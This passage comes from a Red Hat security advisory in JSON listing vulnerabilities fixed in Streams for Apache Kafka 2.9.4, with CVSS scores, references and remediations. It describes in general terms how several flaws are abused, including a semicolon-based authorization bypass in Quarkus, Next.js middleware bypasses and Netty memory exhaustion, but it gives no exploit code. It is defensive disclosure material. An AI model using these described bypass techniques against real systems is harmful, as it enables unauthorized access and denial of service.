"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "org.apache.logging.log4j/log4j-core: Apache Log4j Core: Invalid XML output causes denial of service in logging"
},
{
"cve": "CVE-2026-39852",
"cwe": {
"id": "CWE-551",
"name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
},
"discovery_date": "2026-04-13T13:26:46.572000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2457819"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in io.quarkus:quarkus-vertx-http. A remote attacker can exploit an authorization bypass vulnerability by including semicolons, also known as matrix parameters, in HTTP requests. This allows bypassing path-based HTTP security policies, enabling unauthorized access to protected endpoints. The vulnerability arises because Quarkus\u0027s security layer performs authorization checks on the raw URL path, which preserves these matrix parameters.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "io.quarkus:quarkus-vertx-http: io.quarkus:quarkus-vertx-http: Authorization bypass via semicolons in HTTP requests",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-39852"
},
{
"category": "external",
"summary": "RHBZ#2457819",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457819"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-39852",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-39852"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-39852",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39852"
},
{
"category": "external",
"summary": "https://github.com/quarkusio/quarkus/security/advisories/GHSA-rc95-pcm8-65v9",
"url": "https://github.com/quarkusio/quarkus/security/advisories/GHSA-rc95-pcm8-65v9"
}
],
"release_date": "2026-05-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "To mitigate this issue, configure a reverse proxy or load balancer in front of the Quarkus application to normalize incoming URL paths by stripping matrix parameters (semicolons) before requests reach the Quarkus security layer. This ensures that authorization checks are performed on the intended path. Ensure that any changes to proxy configurations are thoroughly tested and services are reloaded or restarted as necessary to apply the new settings.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "io.quarkus:quarkus-vertx-http: io.quarkus:quarkus-vertx-http: Authorization bypass via semicolons in HTTP requests"
},
{
"cve": "CVE-2026-41240",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-04-23T16:04:41.751666+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2461147"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in DOMPurify, a DOM-only cross-site scripting sanitizer. A remote attacker could exploit an inconsistency in how forbidden tags and attributes are handled when function-based tag additions are used. This allows malicious HTML, MathML, or SVG elements to bypass sanitization and execute arbitrary code in the user\u0027s browser, leading to Cross-Site Scripting (XSS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "DOMPurify: DOMPurify: Cross-Site Scripting (XSS) via inconsistent tag sanitization",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-41240"
},
{
"category": "external",
"summary": "RHBZ#2461147",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461147"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-41240",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41240"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-41240",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41240"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/commit/c361baa18dbdcb3344a41110f4c48ad85bf48f80",
"url": "https://github.com/cure53/DOMPurify/commit/c361baa18dbdcb3344a41110f4c48ad85bf48f80"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/releases/tag/3.4.0",
"url": "https://github.com/cure53/DOMPurify/releases/tag/3.4.0"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m",
"url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m"
}
],
"release_date": "2026-04-23T14:54:32.426000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "DOMPurify: DOMPurify: Cross-Site Scripting (XSS) via inconsistent tag sanitization"
},
{
"cve": "CVE-2026-42044",
"cwe": {
"id": "CWE-915",
"name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
},
"discovery_date": "2026-04-24T19:01:13.418725+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2461624"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Axios, a widely used HTTP client. This vulnerability, known as a Prototype Pollution \"Gadget\" attack, allows a remote attacker to subtly alter JSON API responses. By manipulating a specific function, an attacker can selectively modify data within these responses. This could lead to significant security breaches, including unauthorized privilege escalation, fraudulent balance manipulation, or bypassing critical authorization checks.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42044"
},
{
"category": "external",
"summary": "RHBZ#2461624",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461624"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42044",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42044"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23",
"url": "https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23"
}
],
"release_date": "2026-04-24T17:49:49.517000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget"
},
{
"cve": "CVE-2026-42583",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-05-13T19:01:32.498598+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477219"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty, an asynchronous, event-driven network application framework. A remote attacker can exploit this vulnerability by sending a specially crafted LZ4 compressed data stream. This can cause the Lz4FrameDecoder to allocate a large amount of memory (up to 32 MB per block) before the LZ4 decompression runs, leading to excessive memory consumption and a denial of service (DoS) for the affected application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-codec-compression: io.netty/netty-codec: Netty: Denial of Service via excessive memory allocation in LZ4FrameDecoder",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in Netty\u0027s LZ4FrameDecoder. The decoder allocates a buffer based on the decompressed length from the LZ4 frame header (up to 32 MB per block) before decompression runs. A remote attacker can send a small crafted LZ4 header (as few as 22 bytes) to force excessive memory allocation, leading to a denial of service. Red Hat products that use Netty with LZ4 compression enabled are affected.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42583"
},
{
"category": "external",
"summary": "RHBZ#2477219",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477219"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42583",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42583"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42583",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42583"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-mj4r-2hfc-f8p6",
"url": "https://github.com/netty/netty/security/advisories/GHSA-mj4r-2hfc-f8p6"
}
],
"release_date": "2026-05-13T18:09:19.817000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-codec-compression: io.netty/netty-codec: Netty: Denial of Service via excessive memory allocation in LZ4FrameDecoder"
},
{
"cve": "CVE-2026-42587",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-05-13T19:01:35.415881+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477220"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. A remote attacker can bypass the configured decompression limit in the HttpContentDecompressor by sending a specially crafted compressed payload using Brotli (br), Zstandard (zstd), or Snappy content encodings. This can lead to unbounded memory allocation, resulting in an out-of-memory Denial of Service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-codec-http: io.netty/netty-codec-http2: Netty: Denial of Service via unbounded memory allocation in HTTP content decompression",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in Netty\u0027s HTTP content decompression. A remote attacker can exploit this flaw by sending specially crafted compressed payloads using Brotli, Zstandard, or Snappy encodings, bypassing configured decompression limits. This leads to unbounded memory allocation, potentially causing an out-of-memory condition and rendering affected Red Hat systems unavailable.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42587"
},
{
"category": "external",
"summary": "RHBZ#2477220",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477220"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42587",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42587"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42587",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42587"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv",
"url": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv"
}
],
"release_date": "2026-05-13T18:22:21.699000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-codec-http: io.netty/netty-codec-http2: Netty: Denial of Service via unbounded memory allocation in HTTP content decompression"
},
{
"cve": "CVE-2026-44249",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-06-11T22:02:05.327173+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2488081"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in netty-handler, a component of the Netty network application framework. A remote attacker can exploit an incorrect masking operation in the IpSubnetFilterRule.compareTo() function to bypass configured IPv6 subnet rules. This allows valid public IP addresses to circumvent intended network restrictions, potentially leading to unauthorized access or exposure of services.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty-handler: netty-handler: IPv6 subnet rule bypass due to incorrect masking operation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability in netty-handler is rated as Important because a remote attacker can bypass configured IPv6 subnet filtering rules. This flaw, stemming from an incorrect masking operation, could allow unauthorized access to or exposure of services that are intended to be network-restricted within Red Hat products utilizing the affected Netty component.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44249"
},
{
"category": "external",
"summary": "RHBZ#2488081",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488081"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44249",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44249"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44249",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44249"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/releases/tag/netty-4.1.135.Final",
"url": "https://github.com/netty/netty/releases/tag/netty-4.1.135.Final"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/releases/tag/netty-4.2.15.Final",
"url": "https://github.com/netty/netty/releases/tag/netty-4.2.15.Final"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-3qp7-7mw8-wx86",
"url": "https://github.com/netty/netty/security/advisories/GHSA-3qp7-7mw8-wx86"
}
],
"release_date": "2026-06-11T20:46:14.110000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty-handler: netty-handler: IPv6 subnet rule bypass due to incorrect masking operation"
},
{
"cve": "CVE-2026-44573",
"cwe": {
"id": "CWE-551",
"name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
},
"discovery_date": "2026-05-13T18:01:50.343509+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477199"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Next.js. Applications utilizing the Pages Router with internationalization (i18n) configured and middleware or proxy-based authorization are susceptible to unauthorized access. A remote attacker can exploit this by making locale-less /_next/data/\u003cbuildId\u003e/\u003cpage\u003e.json requests, which bypass the intended authorization checks. This allows the attacker to retrieve sensitive server-side rendered (SSR) JSON data from protected pages, leading to information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "next.js: Next.js: Information disclosure due to middleware bypass in Pages Router with i18n",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Important: A flaw in Next.js applications allows unauthorized access to sensitive server-side rendered (SSR) JSON data by bypassing middleware authorization checks. This occurs when applications use the Pages Router with internationalization (i18n) and middleware or proxy-based authorization, enabling remote attackers to retrieve protected page data through locale-less requests.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44573"
},
{
"category": "external",
"summary": "RHBZ#2477199",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477199"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44573",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44573"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44573",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44573"
},
{
"category": "external",
"summary": "https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5",
"url": "https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5"
}
],
"release_date": "2026-05-13T16:48:16.218000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "next.js: Next.js: Information disclosure due to middleware bypass in Pages Router with i18n"
},
{
"cve": "CVE-2026-44574",
"cwe": {
"id": "CWE-551",
"name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
},
"discovery_date": "2026-05-13T18:02:21.088167+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477207"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Next.js. This vulnerability allows an attacker to bypass security checks in web applications that use Next.js middleware to protect specific web pages. By sending specially crafted web addresses, an attacker can access protected content without proper authorization. This could lead to unauthorized viewing of sensitive information or access to restricted features.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Next.js: Next.js: Authorization bypass via crafted query parameters",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important authorization bypass flaw in Next.js applications, which are utilized in Red Hat AMQ, Red Hat Trusted Artifact Signer, and Red Hat Enterprise Linux AI. The vulnerability arises when applications use Next.js middleware to protect dynamic routes, allowing attackers to access restricted content by manipulating query parameters. This bypass occurs because specially crafted parameters can alter the route value seen by the page while the visible path remains unchanged, circumventing intended security controls.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44574"
},
{
"category": "external",
"summary": "RHBZ#2477207",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477207"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44574",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44574"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44574",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44574"
},
{
"category": "external",
"summary": "https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv",
"url": "https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv"
}
],
"release_date": "2026-05-13T16:56:06.008000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Next.js: Next.js: Authorization bypass via crafted query parameters"
},
{
"cve": "CVE-2026-44575",
"cwe": {
"id": "CWE-551",
"name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
},
"discovery_date": "2026-05-13T18:01:17.168356+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477188"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Next.js. App Router applications that use middleware or proxy-based authorization checks are vulnerable to unauthorized access. A remote attacker can exploit this by crafting specific .rsc and segment-prefetch URLs, which bypass the intended middleware rules. This allows access to protected content without proper authorization.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "next.js: Next.js: Unauthorized access to protected content via middleware bypass",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44575"
},
{
"category": "external",
"summary": "RHBZ#2477188",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477188"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44575",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44575"
},
{
